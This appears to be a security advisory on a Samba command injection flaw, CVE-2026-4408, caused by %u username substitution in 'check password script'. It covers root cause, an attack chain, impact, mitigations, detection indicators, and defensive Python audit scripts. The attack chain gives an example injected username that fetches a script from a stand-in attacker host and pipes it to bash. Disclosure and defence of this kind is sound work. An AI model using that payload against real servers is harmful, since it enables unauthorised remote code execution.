Executive Summary
A high-severity OS command injection vulnerability (CVE-2026-4408) has been disclosed in Samba, the widely deployed open-source SMB/CIFS file sharing and domain controller software used on Linux, Unix, and macOS servers. The vulnerability carries a CVSS score of 9.0 and affects deployments that use the check password script configuration option with the %u username substitution character.
When %u is present in the check password script parameter, the client-supplied username is passed to the script without proper escaping or sanitization, enabling an attacker to inject arbitrary OS commands through a crafted username.
CVSS Score: 9.0 (High)
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-4408 |
| CVSS Score | 9.0 (High) |
| Type | OS Command Injection (CWE-78) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Published | 2026-05-28 |
| Source | NVD / NIST |
Affected Products
| Product | Configuration | Status |
|---|---|---|
| Samba (file server mode) | check password script with %u | Vulnerable |
| Samba (classic domain controller) | check password script with %u | Vulnerable |
The vulnerability is only exploitable when the check password script directive is configured in smb.conf and the script path includes the %u variable substitution, which inserts the connecting client's username into the command line.
Technical Details
Root Cause
Samba's check password script option allows administrators to run an external script to validate passwords during authentication. The %u variable substitution inserts the username provided by the connecting client directly into the shell command constructed to invoke the script.
Because the username value originates from the client (attacker-controlled input) and is not sanitized or escaped before being embedded in the shell command, an attacker can inject shell metacharacters such as ;, &&, |, $(...), and backticks to execute arbitrary commands.
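To make the root cause concrete, the following added Python illustration (not Samba's own code) mimics what plain-text `%u` expansion does and contrasts it with two hardened forms. It assumes the script path from the advisory's example and uses a constructed username "alice; id"; `shell_commands` splits a command line the way a POSIX shell would, so the reader can see that the unsafe expansion yields two commands while the quoted expansion and the argv-list form yield exactly one.

```python
import shlex

# Assumed script path, taken from the advisory's example configuration.
SCRIPT = "/usr/local/bin/check_pass.sh"

def expand_u_unsafe(template: str, username: str) -> str:
    """Mimic the vulnerable %u expansion: client text is spliced verbatim
    into a command line that a shell will later parse."""
    return template.replace("%u", username)

def expand_u_quoted(template: str, username: str) -> str:
    """Same expansion, but the username is shell-quoted first so the
    shell sees it as a single word with no metacharacter meaning."""
    return template.replace("%u", shlex.quote(username))

def build_argv(script: str, username: str) -> list:
    """Hardened form: an argv list handed to exec without any shell, so
    the username can only ever be one argument."""
    return [script, username]

def shell_commands(cmdline: str) -> list:
    """Split a command line into the simple commands a POSIX shell would
    run, breaking on ; | || && & (each returned as its own argv list)."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "|", "||", "&&", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands

if __name__ == "__main__":
    # Constructed username: a valid name followed by an injected command.
    name = "alice; id"
    print(shell_commands(expand_u_unsafe(SCRIPT + " %u", name)))  # two commands
    print(shell_commands(expand_u_quoted(SCRIPT + " %u", name)))  # one command
    print(build_argv(SCRIPT, name))                               # one argument
```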
Attack Chain
1. Attacker identifies a Samba server exposing SMB on port 445 (or 139)
2. Samba smb.conf contains: check password script = /usr/local/bin/check_pass.sh %u
3. Attacker sends an authentication request with a crafted username:
e.g., username = "user; curl attacker.com/shell.sh | bash"
4. Samba constructs the command:
/usr/local/bin/check_pass.sh user; curl attacker.com/shell.sh | bash
5. Shell interprets the injected command — arbitrary code executes
6. Attacker achieves RCE with Samba daemon privileges (often root or dedicated service account)
Why This Is Dangerous
Samba is ubiquitous in enterprise environments, particularly:
- Linux file servers shared with Windows clients
- Legacy domain controllers in hybrid environments
- NAS devices running Samba (many of which have internet-facing admin interfaces)
- Raspberry Pi and embedded Linux deployments in home/small business environments
The check password script feature is used to enforce custom password policies. Many organizations enable this for compliance reasons, making deployment of the vulnerable configuration more common than it might initially appear.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Full arbitrary command execution with Samba daemon privileges |
| Privilege Escalation | If Samba runs as root (common on NAS/embedded), attacker gains root |
| Data Exfiltration | Access to all shared files and directories on the server |
| Lateral Movement | Pivot to other network hosts from compromised Samba server |
| Persistence | Install backdoors, cron jobs, or SSH keys for persistent access |
| Domain Compromise | On classic DC mode, potential to compromise Active Directory equivalents |
Recommendations
Immediate Actions
- Check your smb.conf: search for `check password script` entries containing `%u`: `grep -i "check password script" /etc/samba/smb.conf`
- Remove or replace `%u`: if the script must remain, rewrite it to receive the username via a secure mechanism (e.g., environment variable or stdin) rather than as a command-line argument with `%u`
- Apply the Samba security patch as soon as the Samba Project releases an update for CVE-2026-4408
- Restrict SMB access at the firewall — Block external access to ports 139 and 445
Configuration Hardening
```ini
# smb.conf: safe alternatives to %u in check password script
# VULNERABLE (do not use):
# check password script = /usr/bin/check_pass.sh %u
# SAFER: pass username via environment or stdin instead:
# check password script = /usr/bin/check_pass.sh
# (Have the script read username from a named pipe or dedicated channel)
```
Network-Level Mitigations
- Block ports 139/445 from untrusted external networks at the perimeter firewall
- Restrict Samba authentication to trusted IP ranges using "hosts allow" in smb.conf
- Deploy an IDS/IPS rule to detect shell metacharacters in SMB usernames
- Enable Samba debug logging to detect anomalous authentication patterns
Detection Indicators
| Indicator | Description |
|---|---|
| Shell metacharacters in SMB auth logs | Attempted injection in username field |
| Unexpected child processes spawned by smbd | Post-exploitation code execution |
| Outbound connections from the Samba host | Potential C2 beacon or reverse shell |
| New cron jobs or SSH authorized_keys | Persistence mechanisms installed post-exploitation |
| Samba log entries with malformed usernames | Exploitation attempt indicators |
Look for entries in Samba logs (/var/log/samba/) showing usernames containing characters like ;, |, $(, `, or &&.
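The smb.conf check from Immediate Actions and the log review described above, as one added Python audit script that is not part of the original advisory. The smb.conf fragment and log lines are constructed samples; the "user '...' from <ip>" log layout is an assumption for illustration, so `USER_RE` should be adjusted to the real log format of the Samba build in use.

```python
import re

# Constructed smb.conf fragment (not taken from any real host).
SAMPLE_SMB_CONF = """
[global]
   workgroup = CORP
   check password script = /usr/local/bin/check_pass.sh %u
   hosts allow = 10.0.0.0/8
"""

# Constructed log lines. The "user '...' ... from <ip>" layout is an assumption
# for illustration, not a verbatim Samba log format; adjust USER_RE to your build.
SAMPLE_LOG_LINES = [
    "[2026/05/29 10:01:12.117, 2] auth: user 'alice' authenticated from 10.0.0.5",
    "[2026/05/29 10:01:40.009, 2] auth: user 'bob; id' authenticated from 10.0.0.9",
    "[2026/05/29 10:02:03.450, 2] auth: user '$(id)' failed from 203.0.113.7",
]

# Matches the directive only on uncommented lines ('#' and ';' start comments in smb.conf).
DIRECTIVE_RE = re.compile(r"^\s*check\s+password\s+script\s*=\s*(.+?)\s*$", re.IGNORECASE)
# The metacharacters the advisory lists: ; | & backtick and $(...) / ${...}.
METACHAR_RE = re.compile(r"[;|&`]|\$[({]")
USER_RE = re.compile(r"user '([^']*)'")

def find_vulnerable_directives(conf_text: str) -> list:
    """Return (line_no, value) for each check password script line whose value uses %u."""
    hits = []
    for no, line in enumerate(conf_text.splitlines(), 1):
        m = DIRECTIVE_RE.match(line)
        if m and "%u" in m.group(1):
            hits.append((no, m.group(1)))
    return hits

def flag_suspicious_usernames(log_lines) -> list:
    """Return (line_no, username) for auth log entries whose username carries shell metacharacters."""
    flagged = []
    for no, line in enumerate(log_lines, 1):
        m = USER_RE.search(line)
        if m and METACHAR_RE.search(m.group(1)):
            flagged.append((no, m.group(1)))
    return flagged

if __name__ == "__main__":
    for no, value in find_vulnerable_directives(SAMPLE_SMB_CONF):
        print(f"smb.conf line {no}: vulnerable directive -> {value}")
    for no, user in flag_suspicious_usernames(SAMPLE_LOG_LINES):
        print(f"log line {no}: suspicious username {user!r}")
```

To run against a live host, feed the contents of /etc/samba/smb.conf to `find_vulnerable_directives` and the lines of the files under /var/log/samba/ to `flag_suspicious_usernames`.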
Post-Remediation Checklist
- Confirm smb.conf no longer uses `%u` in check password script
- Apply official Samba patch and verify version with `samba --version`
- Review Samba logs for historical evidence of exploitation attempts
- Audit all accounts on the Samba host for unauthorized additions
- Check cron jobs and startup scripts for attacker persistence
- Verify firewall rules block ports 139/445 from untrusted networks
- Scan file shares for recently modified files that may be attacker artifacts
- Update IDS/IPS signatures to detect CVE-2026-4408 exploitation patterns